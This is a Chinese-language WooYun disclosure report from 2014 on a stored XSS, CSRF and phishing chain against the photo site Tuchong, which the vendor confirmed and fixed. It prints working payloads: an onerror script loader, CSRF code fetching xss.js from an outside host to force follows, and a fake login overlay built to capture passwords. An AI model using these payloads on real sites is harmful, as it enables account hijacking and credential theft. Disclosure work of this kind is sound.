当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070457

漏洞标题:图虫网存储型XSS + CSRF + Phishing 即使有httponly 照样玩的飞起

相关厂商:图虫网

漏洞作者: 0x_Jin

提交时间:2014-07-31 15:21

修复时间:2014-09-14 15:22

公开时间:2014-09-14 15:22

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-31: 细节已通知厂商并且等待厂商处理中
2014-08-01: 厂商已经确认,细节仅向厂商公开
2014-08-11: 细节向核心白帽子及相关领域专家公开
2014-08-21: 细节向普通白帽子公开
2014-08-31: 细节向实习白帽子公开
2014-09-14: 细节向公众公开

简要描述:

之前有蛮多图虫的存储型XSS的 但是都差不多忘了 今天又去找了找。。。但是忘记你们做了httponly了 但是木有关系 即使这样 还有csrf 等等可以玩

详细说明:

在图虫首页 - 讨论 选择任意一个社区 - 发帖子
在标题处 填入 xss payload (在帖子本身的界面已做过滤 在帖子综合界面没做过滤)
上图吧:
未做过滤

QQ20140731-8.png


QQ20140731-9.png


已做过滤的帖子本身界面:

QQ20140731-10.png


再截图一下csrf发出去的包:

QQ20140731-11.png


再截图一下关注者的界面:

QQ20140731-12.png


危害不止这么一点点喔。。不要以为做了http only 就安全了。。。
xss还可以做钓鱼哦 亲~ 由于我不是真的想去钓鱼tuchong 我就拿qq空间钓鱼的模板来演示下把
上张图吧:

QQ20140731-13.png


这个也是用html+css写出来的 稍微花点时间 改改就可以改的跟你们首页的登录框一模一样!
连接在此:http://photogear.tuchong.com/
XSS代码贴上:
<img src=x onerror=jQuery.getScript('hook Address') width=0px> (不让图片显示出来)
csrf代码贴上:
var csrf = function(){
var target="http://capa.tuchong.com/api/site/follow/";
var siteid="site_id=377467";
xss.csrf(target,siteid);
};
if('xss' in window){
csrf();
}else{
var s = document.createElement('script');
s.onload = csrf;
s.src = '//pujun.li/xss.js';
document.body.appendChild(s);
}
钓鱼代码贴上:location.href='javascript:\'<html><head></head><body><div style="position: absolute; top: 322px; left: 599px; width: 402px; height: 256px; z-index: 9999; background-image: url(http://xssreport.sinaapp.com/t/qbg.png); background-position: initial initial; background-repeat: no-repeat no-repeat;"><input type="text" style="position:absolute;top:50px;left:108px;border:none;width:197px;height:24px;line-height:24px;" id="user"><input type="password" style="position:absolute;top:92px;left:108px;border:none;width:197px;height:24px;line-height:24px;" id="pass"><div onclick="sendlogin()" style="position:absolute;top:136px;left:105px;border:none;width:101px;height:28px;cursor:pointer;"></div><img id="upic" style="display:none"></div></body></html>\'';
history.pushState({},"xxx","/cgi-bin/loginpage");

漏洞证明:

http://pentax.tuchong.com/
http://tuchong.com/642/
http://tuchong.com/643/
钓鱼连接:http://photogear.tuchong.com/
虽然访问上面任意一个连接都会发出关注我的包。。。

修复方案:

在帖子本身界面过滤 在帖子显示标题的界面也要过滤哦 亲~ 给个高分吧 图虫的前端漏洞还蛮多的!
输入输出进行过滤!一个存储型xss能做很多事情。。。什么获取内网ip 扫描内网 获取网页截图 以及环境信息就不演示了 毕竟这只是一个sns应用的xss

版权声明:转载请注明来源 0x_Jin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-08-01 13:58

厂商回复:

已经修复,谢谢

最新状态:

暂无


漏洞评价:

评论

  1. 2014-07-31 15:24 | 0x_Jin ( 普通白帽子 | Rank:319 漏洞数:37 | 微博:http://weibo.com/J1n9999)

    审核员 你再把我太平洋的跟瑞丽的存储型XSS审核了把~